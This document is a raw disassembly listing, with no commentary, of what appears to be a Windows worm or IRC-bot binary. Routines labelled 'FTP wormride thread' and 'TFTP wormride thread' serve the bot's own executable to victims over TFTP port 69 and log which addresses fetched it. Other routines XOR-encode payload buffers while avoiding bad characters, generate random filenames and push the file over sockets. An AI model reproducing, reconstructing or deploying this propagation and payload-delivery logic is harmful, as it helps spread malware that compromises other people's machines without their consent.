xor ebx, ebx
push 1
pop edi
loc_40D0CD: ; CODE XREF: sub_40D09D+83�j
lea eax, [ebp+var_8]
push 0Ah
push eax
push edi
call sub_410C9A ; _itoa
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push 0
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_403BBB
mov esi, eax
add esp, 1Ch
test esi, esi
jz short loc_40D119
push esi
call sub_40CF3E
test eax, eax
pop ecx
jz short loc_40D112
lea eax, [ebp+var_8]
push 2
push eax
call sub_4035FB
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
jz short loc_40D126
loc_40D112: ; CODE XREF: sub_40D09D+60�j
push esi
call sub_403D49
pop ecx
loc_40D119: ; CODE XREF: sub_40D09D+55�j
inc edi
cmp edi, 0FFFFh
jb short loc_40D0CD
test ebx, ebx
jnz short loc_40D133
loc_40D126: ; CODE XREF: sub_40D09D+73�j
push [ebp+var_1B0]
call sub_406753
jmp short loc_40D19D
; ---------------------------------------------------------------------------
loc_40D133: ; CODE XREF: sub_40D09D+87�j
mov eax, [ebp+var_1B0]
push dword ptr [eax]
lea eax, [ebp+var_1AC]
push offset unk_4161D4
push eax
call sub_408D50
add esp, 0Ch
loc_40D14F: ; CODE XREF: sub_40D09D+EC�j
push 3E8h
push ebx
call sub_40371E
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40D17F
cmp esi, 0FFFFFFFFh
jz short loc_40D17F
push esi
push offset sub_40CA47
call sub_406541
pop ecx
test eax, eax
pop ecx
jnz short loc_40D17F
push esi
call sub_403D49
pop ecx
loc_40D17F: ; CODE XREF: sub_40D09D+C3�j
; sub_40D09D+C8�j ...
mov eax, [ebp+var_1B0]
cmp dword ptr [eax+4], 0
jz short loc_40D14F
push ebx
call sub_4038E1
push [ebp+var_1B0]
call sub_406753
pop ecx
loc_40D19D: ; CODE XREF: sub_40D09D+94�j
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_40D09D endp
; ---------------------------------------------------------------------------
loc_40D1A7: ; DATA XREF: sub_40D1B3+3E�o
push dword ptr [esp+4]
call sub_40D09D
retn 4
; =============== S U B R O U T I N E =======================================
sub_40D1B3 proc near ; CODE XREF: sub_40735A+2DE�p
; sub_40735A:loc_407658�p
arg_0 = dword ptr 4
push esi
call sub_4032EF
test eax, eax
jnz short loc_40D1FF
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40D1FF
push edi
mov edi, [esp+8+arg_0]
lea eax, [esi+4]
push edi
push eax
call sub_403E60
xor eax, eax
pop ecx
cmp [edi+18Bh], al
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
setz al
push eax
push esi
push offset loc_40D1A7
call sub_40663C
add esp, 10h
pop edi
loc_40D1FF: ; CODE XREF: sub_40D1B3+8�j
; sub_40D1B3+19�j
pop esi
retn
sub_40D1B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D201 proc near ; DATA XREF: sub_40D5AA+35�o
var_D7C = dword ptr -0D7Ch
var_D78 = dword ptr -0D78h
var_578 = byte ptr -578h
var_478 = dword ptr -478h
var_474 = byte ptr -474h
var_2D0 = byte ptr -2D0h
var_2CF = byte ptr -2CFh
var_2CE = byte ptr -2CEh
var_2CD = byte ptr -2CDh
var_2CC = byte ptr -2CCh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_CA = byte ptr -0CAh
var_C9 = byte ptr -0C9h
var_4C = byte ptr -4Ch
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0D7Ch
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_478]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
xor ebx, ebx
push ebx
push 2
pop esi
push esi
push esi
call ds:dword_41122C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_40D595
lea eax, [ebp+var_578]
push eax
call sub_40882C
push eax
call sub_403443
push 10h
lea eax, [ebp+var_3C]
push ebx
push eax
call sub_410850 ; memset
add esp, 14h
mov [ebp+var_3C], si
push 45h
call ds:dword_411248 ; htons
mov [ebp+var_3A], ax
lea eax, [ebp+var_578]
push eax
call ds:dword_411254 ; inet_addr
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push 4
push eax
push 4
push 0FFFFh
push edi
mov [ebp+var_10], 1
call ds:dword_411218 ; setsockopt
lea eax, [ebp+var_3C]
push 10h
push eax
push edi
call ds:dword_41121C ; bind
cmp eax, 0FFFFFFFFh
jz loc_40D595
push offset aRb ; "rb"
push offset dword_41885C
call sub_41086E ; fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40D2D8
push edi
jmp loc_40D58F
; ---------------------------------------------------------------------------
loc_40D2D8: ; CODE XREF: sub_40D201+CF�j
mov eax, [ebp+var_478]
push dword ptr [eax]
lea eax, [ebp+var_474]
push offset unk_416280
push eax
call sub_408D50
push esi
push ebx
push [ebp+arg_0]
call sub_410886 ; fseek
push [ebp+arg_0]
call sub_41085C ; ftell
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_14], eax
call sub_410886 ; fseek
push 80h
lea eax, [ebp+var_CC]
push ebx
push eax
call sub_410850 ; memset
mov esi, ds:dword_411268
add esp, 34h
loc_40D32B: ; CODE XREF: sub_40D201+1A2�j
; sub_40D201+1A7�j ...
push 1
mov ecx, [ebp+var_4]
pop eax
mov [ebp+var_28], ebx
mov [ebp+var_2C], eax
mov [ebp+var_D7C], eax
lea eax, [ebp+var_2C]
mov [ebp+var_D78], ecx
push eax
push ebx
lea eax, [ebp+var_D7C]
push ebx
push eax
push ebx
call ds:dword_411214 ; select
test eax, eax
jle loc_40D574
mov al, byte_417B60
mov ecx, 80h
mov [ebp+var_2D0], al
xor eax, eax
lea edi, [ebp+var_2CF]
mov [ebp+var_8], 10h
rep stosd
stosw
stosb
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_CC]
push 80h
push eax
push [ebp+var_4]
call ds:dword_411264 ; recvfrom
cmp eax, ebx
jz short loc_40D32B
cmp eax, 0FFFFFFFFh
jz short loc_40D32B
cmp [ebp+var_CC], bl
jnz loc_40D560
cmp [ebp+var_CB], 1
jnz loc_40D45E
lea eax, [ebp+var_CA]
push eax
call sub_410826 ; strlen
mov edi, offset aOctet ; "octet"
lea eax, [ebp+eax+var_C9]
push edi
mov [ebp+var_C], eax
call sub_410826 ; strlen
push eax
push [ebp+var_C]
push edi
call sub_4108E0 ; strncmp
add esp, 14h
test eax, eax
jz short loc_40D409
push [ebp+var_8]
lea eax, [ebp+var_24]
push eax
push ebx
push 13h
push offset dword_416264
jmp loc_40D56F
; ---------------------------------------------------------------------------
loc_40D409: ; CODE XREF: sub_40D201+1F2�j
push ebx
push ebx
push [ebp+arg_0]
call sub_410886 ; fseek
push [ebp+arg_0]
lea eax, [ebp+var_2CC]
mov [ebp+var_2D0], bl
mov [ebp+var_2CF], 3
push 200h
push 1
push eax
mov [ebp+var_2CE], bl
mov [ebp+var_2CD], 1
call sub_410880 ; fread
add esp, 1Ch
lea ecx, [ebp+var_24]
add eax, 4
push [ebp+var_8]
push ecx
push ebx
push eax
lea eax, [ebp+var_2D0]
push eax
jmp loc_40D56F
; ---------------------------------------------------------------------------
loc_40D45E: ; CODE XREF: sub_40D201+1BC�j
cmp [ebp+var_CB], 4
jnz loc_40D560
mov cl, [ebp+var_C9]
mov al, [ebp+var_CA]
cmp cl, 0FFh
mov [ebp+var_2D0], bl
mov [ebp+var_2CF], 3
jnz short loc_40D49B
inc al
xor cl, cl
mov [ebp+var_2CE], al
mov [ebp+var_2CD], bl
jmp short loc_40D4A9
; ---------------------------------------------------------------------------
loc_40D49B: ; CODE XREF: sub_40D201+286�j
inc cl
mov [ebp+var_2CE], al
mov [ebp+var_2CD], cl
loc_40D4A9: ; CODE XREF: sub_40D201+298�j
movzx eax, al
movzx ecx, cl
shl eax, 8
push ebx
lea eax, [eax+ecx-1]
shl eax, 9
push eax
mov [ebp+var_C], eax
push [ebp+arg_0]
call sub_410886 ; fseek
push [ebp+arg_0]
lea eax, [ebp+var_2CC]
push 200h
push 1
push eax
call sub_410880 ; fread
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_24]
push [ebp+var_8]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_2D0]
push eax
push [ebp+var_4]
call esi ; sendto
cmp edi, ebx
jnz short loc_40D574
mov eax, [ebp+var_C]
cmp eax, [ebp+var_14]
jb short loc_40D574
mov edi, [ebp+var_20]
push edi
push offset dword_418840
call sub_406B0B
pop ecx
cmp eax, edi
pop ecx
jz short loc_40D574
push 1
push offset dword_418844
call sub_406AFA
pop ecx
mov edi, eax
pop ecx
push 10h
push [ebp+var_20]
call ds:dword_411230 ; inet_ntoa
push eax
lea eax, [ebp+var_4C]
push eax
call sub_4052A6
add esp, 0Ch
lea eax, [ebp+var_4C]
inc edi
push eax
push edi
push offset aWormride ; "wormride"
push offset unk_416228
push offset dword_4177EC
call sub_408CDE
add esp, 14h
jmp short loc_40D574
; ---------------------------------------------------------------------------
loc_40D560: ; CODE XREF: sub_40D201+1AF�j
; sub_40D201+264�j
push [ebp+var_8]
lea eax, [ebp+var_24]
push eax
push ebx
push 9
push offset dword_41621C
loc_40D56F: ; CODE XREF: sub_40D201+203�j
; sub_40D201+258�j
push [ebp+var_4]
call esi ; sendto
loc_40D574: ; CODE XREF: sub_40D201+158�j
; sub_40D201+2FA�j ...
mov eax, [ebp+var_478]
cmp [eax+4], ebx
jz loc_40D32B
push [ebp+arg_0]
call sub_410868 ; fclose
pop ecx
push [ebp+var_4]
loc_40D58F: ; CODE XREF: sub_40D201+D2�j
call ds:dword_411240 ; closesocket
loc_40D595: ; CODE XREF: sub_40D201+41�j
; sub_40D201+B3�j
push [ebp+var_478]
call sub_406753
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_40D201 endp
; =============== S U B R O U T I N E =======================================
sub_40D5AA proc near ; CODE XREF: sub_40735A+2F4�p
; sub_40735A+30A�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40D5ED
push edi
mov edi, [esp+8+arg_0]
lea eax, [esi+4]
push edi
push eax
call sub_403E60
xor eax, eax
pop ecx
cmp [edi+18Bh], al
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
setz al
push eax
push esi
push offset sub_40D201
call sub_40663C
add esp, 10h
pop edi
loc_40D5ED: ; CODE XREF: sub_40D5AA+10�j
pop esi
retn
sub_40D5AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D5EF proc near ; CODE XREF: sub_40D700+62�p
; sub_40D700+84�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
xor edx, edx
push esi
cmp [ebp+arg_4], edx
jbe short loc_40D61E
loc_40D5FA: ; CODE XREF: sub_40D5EF+2D�j
xor ecx, ecx
cmp [ebp+arg_C], ecx
jbe short loc_40D618
mov eax, [ebp+arg_0]
mov al, [edx+eax]
xor al, [ebp+arg_10]
loc_40D60A: ; CODE XREF: sub_40D5EF+27�j
mov esi, [ebp+arg_8]
cmp al, [ecx+esi]
jz short loc_40D623
inc ecx
cmp ecx, [ebp+arg_C]
jb short loc_40D60A
loc_40D618: ; CODE XREF: sub_40D5EF+10�j
inc edx
cmp edx, [ebp+arg_4]
jb short loc_40D5FA
loc_40D61E: ; CODE XREF: sub_40D5EF+9�j
xor eax, eax
loc_40D620: ; CODE XREF: sub_40D5EF+37�j
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40D623: ; CODE XREF: sub_40D5EF+21�j
push 1
pop eax
jmp short loc_40D620
sub_40D5EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D628 proc near ; CODE XREF: sub_40BE08+36�p
; sub_40C225+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
cmp [ebp+arg_8], 1
push ebx
push esi
push edi
jnz short loc_40D661
mov eax, 0B2h
cmp [ebp+arg_4], eax
jb short loc_40D69E
mov esi, [ebp+arg_0]
push eax
push offset dword_41645C
push esi
mov [ebp+arg_4], eax
call sub_410838 ; memcpy
add esp, 0Ch
lea ebx, [esi+8Fh]
lea edi, [esi+88h]
jmp short loc_40D6C3
; ---------------------------------------------------------------------------
loc_40D661: ; CODE XREF: sub_40D628+A�j
cmp [ebp+arg_8], 2
jnz short loc_40D694
mov eax, 0C6h
cmp [ebp+arg_4], eax
jb short loc_40D69E
mov esi, [ebp+arg_0]
push eax
push offset dword_416394
push esi
mov [ebp+arg_4], eax
call sub_410838 ; memcpy
add esp, 0Ch
lea edi, [esi+89h]
add esi, 0C0h
jmp short loc_40D6D8
; ---------------------------------------------------------------------------
loc_40D694: ; CODE XREF: sub_40D628+3D�j
mov eax, 0B2h
cmp [ebp+arg_4], eax
jnb short loc_40D6A2
loc_40D69E: ; CODE XREF: sub_40D628+14�j
; sub_40D628+47�j
xor eax, eax
jmp short loc_40D6FB
; ---------------------------------------------------------------------------
loc_40D6A2: ; CODE XREF: sub_40D628+74�j
mov esi, [ebp+arg_0]
push eax
push offset dword_4162E0
push esi
mov [ebp+arg_4], eax
call sub_410838 ; memcpy
add esp, 0Ch
lea ebx, [esi+86h]
lea edi, [esi+8Dh]
loc_40D6C3: ; CODE XREF: sub_40D628+37�j
add esi, 0ACh
test ebx, ebx
jz short loc_40D6D8
push [ebp+arg_C]
call ds:dword_411254 ; inet_addr
mov [ebx], eax
loc_40D6D8: ; CODE XREF: sub_40D628+6A�j
; sub_40D628+A3�j
test edi, edi
jz short loc_40D6EF
push [ebp+arg_10]
call sub_41088C ; atoi
pop ecx
push eax
call ds:dword_411248 ; htons
mov [edi], ax
loc_40D6EF: ; CODE XREF: sub_40D628+B2�j
test esi, esi
jz short loc_40D6F8
mov eax, [ebp+arg_14]
mov [esi], eax
loc_40D6F8: ; CODE XREF: sub_40D628+C9�j
mov eax, [ebp+arg_4]
loc_40D6FB: ; CODE XREF: sub_40D628+78�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40D628 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D700 proc near ; CODE XREF: sub_40AE3D+3D�p
; seg000:0040B159�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 1Ch
push esi
push edi
jb short loc_40D735
push [ebp+arg_14]
mov esi, [ebp+arg_0]
push [ebp+arg_10]
lea eax, [esi+1Ch]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push eax
call sub_40D628
mov edi, eax
add esp, 18h
test edi, edi
jnz short loc_40D73C
loc_40D735: ; CODE XREF: sub_40D700+A�j
xor eax, eax
jmp loc_40D7F9
; ---------------------------------------------------------------------------
loc_40D73C: ; CODE XREF: sub_40D700+33�j
push 1Ch
push offset loc_4162C0
push esi
call sub_410838 ; memcpy
mov eax, dword_416690
add esp, 0Ch
mov [ebp+arg_4], eax
loc_40D754: ; CODE XREF: sub_40D700+9D�j
push 0
lea eax, [ebp+arg_4]
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
push eax
call sub_40D5EF
add esp, 14h
test eax, eax
jnz short loc_40D790
mov eax, [ebp+arg_4]
push 0
push [ebp+arg_1C]
xor eax, edi
mov [ebp+arg_14], eax
lea eax, [ebp+arg_14]
push [ebp+arg_18]
push 4
push eax
call sub_40D5EF
add esp, 14h
test eax, eax
jz short loc_40D79F
loc_40D790: ; CODE XREF: sub_40D700+6C�j
call sub_40AB05
mov [ebp+arg_4], eax
mov dword_416690, eax
jmp short loc_40D754
; ---------------------------------------------------------------------------
loc_40D79F: ; CODE XREF: sub_40D700+8E�j
mov eax, [ebp+arg_4]
push ebx
mov [esi+3], eax
mov eax, [ebp+arg_14]
mov [esi+9], eax
mov bl, byte_41668D
mov byte ptr [ebp+arg_0], bl
loc_40D7B5: ; CODE XREF: sub_40D700+DE�j
push [ebp+arg_0]
push [ebp+arg_1C]
push [ebp+arg_18]
push edi
push [ebp+var_4]
call sub_40D5EF
add esp, 14h
test eax, eax
jz short loc_40D7E0
call sub_40AB18
mov bl, al
mov byte ptr [ebp+arg_0], bl
mov byte_41668D, bl
jmp short loc_40D7B5
; ---------------------------------------------------------------------------
loc_40D7E0: ; CODE XREF: sub_40D700+CC�j
xor eax, eax
mov [esi+12h], bl
test edi, edi
jbe short loc_40D7F5
loc_40D7E9: ; CODE XREF: sub_40D700+F3�j
mov ecx, [ebp+var_4]
add ecx, eax
xor [ecx], bl
inc eax
cmp eax, edi
jb short loc_40D7E9
loc_40D7F5: ; CODE XREF: sub_40D700+E7�j
lea eax, [edi+1Ch]
pop ebx
loc_40D7F9: ; CODE XREF: sub_40D700+37�j
pop edi
pop esi
leave
retn
sub_40D700 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7FD proc near ; CODE XREF: sub_40DA6E+F�p
; sub_40DB90+51�p ...
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18Ch
push esi
push edi
push 8
push 4
call sub_40AADE
push 7Ah
push 61h
mov edi, eax
call sub_40AADE
add esp, 10h
mov [ebp+var_10], al
push 1
pop esi
cmp edi, esi
jz short loc_40D83D
loc_40D829: ; CODE XREF: sub_40D7FD+3E�j
push 7Ah
push 61h
call sub_40AADE
mov [ebp+esi+var_10], al
inc esi
pop ecx
cmp esi, edi
pop ecx
jnz short loc_40D829
loc_40D83D: ; CODE XREF: sub_40D7FD+2A�j
lea eax, [ebp+esi+var_10]
push offset dword_412620
push eax
call sub_410820 ; _mbscpy
mov esi, 17Ch
lea eax, [ebp+var_18C]
push esi
push offset dword_416510
push eax
call sub_410838 ; memcpy
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_18C]
push esi
push eax
push [ebp+arg_0]
call sub_403D54
add esp, 28h
pop edi
pop esi
leave
retn
sub_40D7FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D88A proc near ; CODE XREF: sub_40DA6E+EA�p
; sub_40DB90+75�p ...
var_240 = byte ptr -240h
var_40 = byte ptr -40h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
push ebx
push esi
push edi
xor edi, edi
cmp dword_41884C, edi
push 1
pop ebx
jnz short loc_40D915
cmp off_4177B8, edi
mov dword_41884C, ebx
jz short loc_40D915
mov eax, offset off_4177B8
xor esi, esi
loc_40D8B8: ; CODE XREF: sub_40D88A+81�j
push 20h
push dword ptr [eax]
lea eax, [ebp+var_20]
push eax
call sub_4052A6
push 20h
lea eax, [ebp+var_40]
push off_416698[esi]
push eax
call sub_4052A6
lea eax, [ebp+var_20]
push eax
call sub_40AC15
lea eax, [ebp+var_40]
push eax
call sub_40AC15
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_20]
push eax
call sub_410AEE ; strcmp
add esp, 28h
test eax, eax
jnz short loc_40D90F
add esi, 0Ch
cmp off_4177B8[esi], edi
lea eax, off_4177B8[esi]
jnz short loc_40D8B8
jmp short loc_40D915
; ---------------------------------------------------------------------------
loc_40D90F: ; CODE XREF: sub_40D88A+70�j
mov dword_418850, ebx
loc_40D915: ; CODE XREF: sub_40D88A+17�j
; sub_40D88A+25�j ...
cmp dword_418850, edi
jnz short loc_40D97A
push offset aRb ; "rb"
push offset dword_418970
call sub_41086E ; fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_40D97C
mov esi, 200h
push edi
push esi
lea eax, [ebp+var_240]
push ebx
push eax
call sub_410880 ; fread
add esp, 10h
loc_40D94B: ; CODE XREF: sub_40D88A+E7�j
test eax, eax
jz short loc_40D973
push eax
lea eax, [ebp+var_240]
push eax
push [ebp+arg_0]
call sub_403D54
push edi
push esi
lea eax, [ebp+var_240]
push ebx
push eax
call sub_410880 ; fread
add esp, 1Ch
jmp short loc_40D94B
; ---------------------------------------------------------------------------
loc_40D973: ; CODE XREF: sub_40D88A+C3�j
push edi
call sub_410868 ; fclose
pop ecx
loc_40D97A: ; CODE XREF: sub_40D88A+91�j
mov eax, ebx
loc_40D97C: ; CODE XREF: sub_40D88A+A8�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D88A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D981 proc near ; CODE XREF: sub_40DB90+57�p
; sub_40DC48+12�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_403DD6
pop ecx
test eax, eax
pop ecx
jnz short loc_40D99E
leave
retn
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D981+19�j
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call ds:dword_411258 ; recv
mov eax, [ebp+var_4]
leave
retn
sub_40D981 endp
; =============== S U B R O U T I N E =======================================
sub_40D9B4 proc near ; CODE XREF: sub_40DB90+67�p
; sub_40DC48+22�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
xor edi, edi
xor eax, eax
cmp off_416796, edi
jz short loc_40DA03
mov ecx, offset off_416796
loc_40D9C6: ; CODE XREF: sub_40D9B4+21�j
mov edx, [ecx-8]
cmp edx, [esp+4+arg_0]
jz short loc_40D9D9
add ecx, 3Ah
inc eax
cmp [ecx], edi
jnz short loc_40D9C6
jmp short loc_40DA03
; ---------------------------------------------------------------------------
loc_40D9D9: ; CODE XREF: sub_40D9B4+19�j
imul eax, 3Ah
push esi
mov esi, [esp+8+arg_4]
lea edi, dword_416768[eax]
push 3Ah
push edi
push esi
call sub_410838 ; memcpy
push esi
call sub_40AC4E
add esi, 13h
push esi
call sub_40AC4E
add esp, 14h
pop esi
loc_40DA03: ; CODE XREF: sub_40D9B4+B�j
; sub_40D9B4+23�j
mov eax, edi
pop edi
retn
sub_40D9B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA07 proc near ; CODE XREF: sub_40DA6E+103�p
; sub_40DB90+8A�p ...
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 100h
mov eax, [ebp+arg_0]
push esi
add eax, 2Ah
push 1
push eax
call sub_406AFA
mov esi, eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_403495
add esp, 10h
test eax, eax
jnz short loc_40DA4A
lea eax, [ebp+var_100]
push offset aUnknown ; "unknown"
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_40DA4A: ; CODE XREF: sub_40DA07+2E�j
lea eax, [ebp+var_100]
inc esi
push eax
push esi
push [ebp+arg_C]
push [ebp+arg_4]
push offset unk_414074
push offset dword_4177EC
call sub_408CDE
add esp, 18h
pop esi
leave
retn
sub_40DA07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA6E proc near ; CODE XREF: sub_40E03D+119�p
var_244 = dword ptr -244h
var_40 = byte ptr -40h
var_2D = byte ptr -2Dh
var_1A = dword ptr -1Ah
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 244h
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_40D7FD
push 3Ah
lea eax, [ebp+var_40]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
lea eax, [ebp+var_40]
push eax
call sub_40AC4E
lea eax, [ebp+var_2D]
push eax
call sub_40AC4E
mov edi, 203h
lea eax, [ebp+var_244]
push edi
push 0
push eax
call sub_410850 ; memset
add esp, 24h
and [ebp+var_4], 0
mov ebx, 3E8h
mov esi, 200h
loc_40DAC7: ; CODE XREF: sub_40DA6E+DF�j
push ebx
push [ebp+arg_4]
call sub_403DD6
pop ecx
test eax, eax
pop ecx
jz short loc_40DB46
lea eax, [ebp+var_244+3]
push esi
push eax
push [ebp+arg_4]
call sub_403D69
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40DB8B
xor ecx, ecx
cmp eax, ecx
jz short loc_40DB35
jbe short loc_40DB0B
loc_40DAFA: ; CODE XREF: sub_40DA6E+9B�j
mov edx, [ebp+ecx+var_244]
cmp edx, [ebp+var_1A]
jz short loc_40DB55
inc ecx
cmp ecx, eax
jb short loc_40DAFA
loc_40DB0B: ; CODE XREF: sub_40DA6E+8A�j
lea eax, [ebp+eax+var_244]
push 3
push eax
lea eax, [ebp+var_244]
push eax
call sub_410838 ; memcpy
push esi
lea eax, [ebp+var_244+3]
push 0
push eax
call sub_410850 ; memset
add esp, 18h
jmp short loc_40DB46
; ---------------------------------------------------------------------------
loc_40DB35: ; CODE XREF: sub_40DA6E+88�j
push edi
lea eax, [ebp+var_244]
push ecx
push eax
call sub_410850 ; memset
add esp, 0Ch
loc_40DB46: ; CODE XREF: sub_40DA6E+66�j
; sub_40DA6E+C5�j
inc [ebp+var_4]
cmp [ebp+var_4], 3Ch
jnz loc_40DAC7
jmp short loc_40DB8B
; ---------------------------------------------------------------------------
loc_40DB55: ; CODE XREF: sub_40DA6E+96�j
push [ebp+arg_4]
call sub_40D88A
test eax, eax
pop ecx
jz short loc_40DB8B
push offset dword_416700
lea eax, [ebp+var_40]
push [ebp+arg_4]
push eax
push [ebp+arg_0]
call sub_40DA07
add esp, 10h
push 1
push [ebp+arg_4]
call ds:dword_411210 ; shutdown
push ebx
call ds:dword_4110A4 ; Sleep
loc_40DB8B: ; CODE XREF: sub_40DA6E+7E�j
; sub_40DA6E+E5�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40DA6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB90 proc near ; CODE XREF: sub_40E03D+134�p
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_44 = byte ptr -44h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 848h
push ebx
push esi
push edi
xor edi, edi
push edi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403AFB
add esp, 0Ch
mov esi, eax
lea eax, [ebp+var_8]
mov [ebp+var_8], 3Ch
push 1
mov [ebp+var_4], edi
pop ebx
mov [ebp+var_844], esi
push eax
lea eax, [ebp+var_848]
push edi
push eax
push edi
push edi
mov [ebp+var_848], ebx
call ds:dword_411214 ; select
cmp eax, ebx
push esi
jnz short loc_40DC37
call sub_40D7FD
push esi
call sub_40D981
pop ecx
cmp eax, edi
pop ecx
jz short loc_40DC36
lea ecx, [ebp+var_44]
push ecx
push eax
call sub_40D9B4
pop ecx
mov ebx, eax
pop ecx
cmp ebx, edi
push esi
jz short loc_40DC37
call sub_40D88A
test eax, eax
pop ecx
jz short loc_40DC36
push offset dword_416704
lea eax, [ebp+var_44]
push esi
push eax
push ebx
call sub_40DA07
add esp, 10h
push 1
push esi
call ds:dword_411210 ; shutdown
push 3E8h
call ds:dword_4110A4 ; Sleep
loc_40DC36: ; CODE XREF: sub_40DB90+60�j
; sub_40DB90+7D�j
push esi
loc_40DC37: ; CODE XREF: sub_40DB90+4F�j
; sub_40DB90+73�j
call sub_403D49
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40DB90 endp
; =============== S U B R O U T I N E =======================================
sub_40DC42 proc near ; CODE XREF: sub_40E03D:loc_40E111�p
mov eax, offset dword_418854
retn
sub_40DC42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC48 proc near ; DATA XREF: sub_40DCB8+AA�o
var_3C = byte ptr -3Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
push esi
mov esi, [ebp+arg_0]
push edi
push esi
call sub_40D7FD
push esi
call sub_40D981
pop ecx
test eax, eax
pop ecx
jz short loc_40DCA9
lea ecx, [ebp+var_3C]
push ecx
push eax
call sub_40D9B4
pop ecx
mov edi, eax
pop ecx
test edi, edi
push esi
jz short loc_40DCAA
call sub_40D88A
test eax, eax
pop ecx
jz short loc_40DCA9
push offset dword_416708
lea eax, [ebp+var_3C]
push esi
push eax
push edi
call sub_40DA07
add esp, 10h
push 1
push esi
call ds:dword_411210 ; shutdown
push 3E8h
call ds:dword_4110A4 ; Sleep
loc_40DCA9: ; CODE XREF: sub_40DC48+1B�j
